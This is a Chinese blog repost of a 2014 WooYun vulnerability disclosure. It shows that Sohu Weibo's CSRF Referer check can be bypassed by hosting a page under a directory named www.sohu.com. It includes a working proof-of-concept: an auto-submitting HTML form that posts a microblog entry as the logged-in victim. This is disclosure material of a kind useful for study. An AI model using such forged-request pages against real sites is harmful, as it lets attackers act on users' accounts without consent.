记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

搜狐微博绕过CSRF防御(安全设计缺陷)

2014-07-07 16:10

搜狐微博csrf检查referer存在问题

可用http://www.a.com/www.sohu.com/来绕过防御

漏洞证明:

新建html

<body>

<form action="http://t.sohu.com/twAction/insertTwitter" method="POST">

<input type=hidden name="msg" value="hello everybody">

</form>

<script>

document.forms[0].submit();

</script>

</body>



在网站新建一个www.sohu.com目录 把上面这个html丢在里面

例子

http://qaz.me/www.sohu.com/csrf.html

微博登录状态下访问此页面成功发表微博

123.jpg

修复方案:

referer逻辑


知识来源: www.wooyun.org/bugs/wooyun-2014-061997

阅读:95230 | 评论:0 | 标签:CSRF

想收藏或者和大家分享这篇好文章→复制链接地址

“搜狐微博绕过CSRF防御(安全设计缺陷)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云